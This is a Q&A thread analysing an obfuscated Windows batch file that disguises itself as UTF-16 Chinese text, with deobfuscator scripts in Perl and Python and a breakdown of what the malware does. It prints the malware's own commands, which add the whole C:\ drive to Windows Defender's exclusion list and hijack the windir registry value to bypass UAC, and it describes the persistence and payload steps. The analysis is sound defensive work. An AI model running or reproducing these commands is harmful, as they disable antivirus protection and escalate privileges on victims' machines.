How to decode contents of a batch file with chinese characters
Solution 1:
The file actually has regular ASCII text (or Windows-125x).
It only looks a little like UTF-16 containing some Chinese characters, due to some carefully chosen bytes at the very beginning that are able to trick file and other charset detection software. (Your screenshot shows that the file begins with FF FE, which is U+FEFF "Byte order mark" in UTF-16LE.)
But if I store your example as UTF-16 LE and then ask my text editor to directly interpret those bytes as ASCII or Windows-1252 – not convert but literally open the file as cp1252, just like your hex editor did – then I get a regular Windows Cmd batch script:
&cls
@%pUBlIc:~89,83%%PUBLic:~5,1%CHo^ of^%PuBlIC:~46,16%f
^%pUBlIC:~14,1%^L%pUBliC:~55,17%^%publIc:~4,1%
SEt R^=Jg^%pUBLIc:~13,1%^gtGXz%pUBLIc:~4,1%w%pUBLIc:~11,1%^hm%pUBLIc:~10,1%^S^HI^O
%r:~8,1%e%r:~4,1% na%r:~12,1%e = %r:~10,1%a%r:~4,1%c%r:~11,1% o%r:~10,1%%r:~13,1%%r:~8,1%ca%r:~4,1%or %r:~10,1%y %r:~12,1%oo%r:~12,1%825
%r:~8,1%e%r:~4,1% %r:~1,1%%r:~2,1%%r:~4,1%%r:~11,1%%r:~13,1%%r:~10,1% = %r:~11,1%%r:~4,1%%r:~4,1%p%r:~8,1%://%r:~1,1%%r:~2,1%%r:~4,1%%r:~11,1%%r:~13,1%%r:~10,1%.co%r:~12,1%/%r:~12,1%oo%r:~12,1%825/%r:~10,1%a%r:~4,1%c%r:~11,1%-o%r:~10,1%f%r:~13,1%%r:~8,1%ca%r:~4,1%or-%r:~12,1%ade-%r:~2,1%n-py%r:~4,1%%r:~11,1%on
^n^e%r:~4,1%^1^ %r:~8,1%^E%r:~8,1%%r:~14,1%%r:~16,1%o^N >^NU^L 2>&1
^%r:~2,1%F %eRRORLeVEl% == 0 (
Po^%R:~9,1%ER^%R:~14,1%%R:~11,1%^E^L^l/W 01 /ep 0^/^n%R:~17,1%^p^/c ^"^Ad^D-^M^pPr^EFe^R^En^Ce ^-^E%R:~6,1%^cl%R:~13,1%%R:~14,1%^%R:~16,1%o^N^Pa%R:~4,1%%R:~15,1% '^C:\' -^f^oRC^E;e^%R:~6,1%^%R:~2,1%%R:~4,1% "
) EL%r:~8,1%^e (
re%r:~1,1% add %r:~15,1%KCU\Env%r:~2,1%ron%r:~12,1%en%r:~4,1% /f /v %r:~9,1%%r:~2,1%nd%r:~2,1%r /%r:~4,1% RE^%r:~5,1%_%r:~14,1%Z^ /d ^"c%r:~12,1%d.exe /c %r:~8,1%%r:~4,1%ar%r:~4,1% \"\"^ /%R:~12,1%%R:~2,1%^n \"%~F0\">^N%r:~13,1%L 2>&1 || ^%R:~14,1%^vc%R:~15,1%%R:~17,1%%R:~8,1%%R:~4,1%^" >N%r:~13,1%^L 2>&1
%r:~14,1%c%r:~15,1%TA%r:~8,1%k%r:~8,1% /RUN ^/Tn \M%r:~16,1%cr
(Generally, the same bytes can be read in several ways – e.g. the two bytes 2c 31 mean the character "ㄬ" if read as UTF-16 LE, or the characters ,1 if read as ASCII. For example, you see "㩲㉾ㄬ" a lot in your editor because it's actually r:~2,1, part of a batch variable expansion.)
This "gibberish" is a standard batch file, only somewhat obfuscated – you're looking at lots of %variable:~start,length% variable expansions; specific characters from the %PUBLIC% variable are reassembled into %R%, and then specific characters of that variable are used to build up commands. For example, re%r:~1,1% add %r:~15,1%KCU\Env%r:~2,1%ron%r:~12,1%en%r:~4,1% /f /v clearly means reg add HKCU\Environment /f /v.
After building up most of %R% by guessing¹, and removing a lot of extraneous ^ escape characters, the result is:
&cls
@ECHo off
cLs
SEt R=JgigtGXzswbhmuSHIO
set name = batch obuscator by moom825
set github = https://github.com/moom825/batch-obfuscator-made-in-python
net1 sEsSIoN >NUL 2>&1
iF %eRRORLeVEl% == 0 (
PowERShELl/W 01 /ep 0/nOp/c "AdD-MpPrEFeREnCe -EXcluSIoNPatH 'C:\' -foRCE;eXit "
) ELse (
reg add HKCU\Environment /f /v windir /t REG_SZ /d "cmd.exe /c start \"\" /min \"%~F0\">NuL 2>&1 || SvcHOst" >NuL 2>&1
ScHTAsks /RUN /Tn \MIcr
The first thing it does is very suspicious – after checking whether it has Administrator rights using net1 session, it adds the whole C:\ drive to Windows Defender's exclusion list. (In the "else" case it probably tries to elevate itself through Task Scheduler, as a way of bypassing UAC.)
Based on the initial snippet, this might be able to deobfuscate the rest:
#!/usr/bin/env perl
use strict;
use warnings;

# Guessed values of the two variables the script slices characters from.
my %vars = (
    public => "C:\\Users\\Public",
    r      => "JgigtGXzswbhmuSHIO",
);

while (<>) {
    # Expand %VAR:~start,len% first, as cmd does; an out-of-range start (e.g. %PUBLIC:~89,83%) yields "".
    s{%(r|public):~(\d+),(\d+)%}{ $2 < length $vars{lc $1} ? substr($vars{lc $1}, $2, $3) : "" }ige;
    # Then drop the ^ escape characters.
    s/\^(.)/$1/g;
    print;
}
¹ (I did this on Linux and didn't realize that %PUBLIC% is actually a default variable that exists on all Windows systems...)
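A Python deobfuscator along the same lines as the Perl one above, added here as an example (it is not part of the original answer). It assumes the same two variable values the answer guessed, and goes a bit further than this sample needs: it also handles the negative offsets and the %var:~start% form that cmd supports, and leaves unknown names such as %errorlevel% untouched.

```python
import re

# Values the answer guessed for the two sliced variables: %PUBLIC% is the
# real default on Windows, %R% is set by the script itself.
ENV = {"PUBLIC": r"C:\Users\Public", "R": "JgigtGXzswbhmuSHIO"}

# %NAME%, %NAME:~start% or %NAME:~start,len% (start/len may be negative).
_REF = re.compile(r"%([A-Za-z_][A-Za-z0-9_]*)(?::~(-?\d+)(?:,(-?\d+))?)?%")


def substr(value, start, length):
    """cmd's substring rules: negative start counts from the end, negative
    len is an end offset from the end, a start past the end yields ""."""
    n = len(value)
    if start < 0:
        start = max(n + start, 0)
    if start >= n:
        return ""
    if length is None:
        return value[start:]
    if length < 0:
        return value[start:n + length] if n + length > start else ""
    return value[start:start + length]


def expand(line, env=ENV):
    """Expand variable references first, then drop ^ escapes (cmd's order)."""
    def repl(m):
        value = env.get(m.group(1).upper())
        if value is None:            # unknown name: leave the reference as-is
            return m.group(0)
        if m.group(2) is None:       # plain %VAR%
            return value
        length = int(m.group(3)) if m.group(3) is not None else None
        return substr(value, int(m.group(2)), length)

    expanded = _REF.sub(repl, line)
    return re.sub(r"\^(.)", r"\1", expanded)


# Three lines taken from the obfuscated sample above.
SAMPLE = [
    "@%pUBlIc:~89,83%%PUBLic:~5,1%CHo^ of^%PuBlIC:~46,16%f",
    "SEt R^=Jg^%pUBLIc:~13,1%^gtGXz%pUBLIc:~4,1%w%pUBLIc:~11,1%^hm%pUBLIc:~10,1%^S^HI^O",
    r"re%r:~1,1% add %r:~15,1%KCU\Env%r:~2,1%ron%r:~12,1%en%r:~4,1% /f /v",
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(expand(line))
```

Feed it the file after re-reading the bytes as cp1252, one line at a time; a `%R%` that is itself built from `%PUBLIC%` can be recovered by expanding the SEt line first and updating ENV.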
Solution 2:
Judging by the existing text that I can see, I think that this is a CTF challenge by John Hammond (https://ctftime.org/task/17327). I'm pretty sure John made the challenge off of a virus sample, so it is either that you have John's CTF on your server for some reason (harmless) or you have the original sample on your server (possibly harmful).
The virus does a UAC (User Account Control) bypass using the Task Scheduler UAC bypass method (I'm now basing this off of John's CTF); it then disables all of Windows Defender, then it will write a base64-encoded exe to "C:\Users\Username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup", then it will use a Windows utility called "certutil" which has a base64 decode function. So in total this batch file will get admin, disable Defender, then write the payload to startup adding persistence, then decode the payload and run it.
I would highly suggest NOT running this!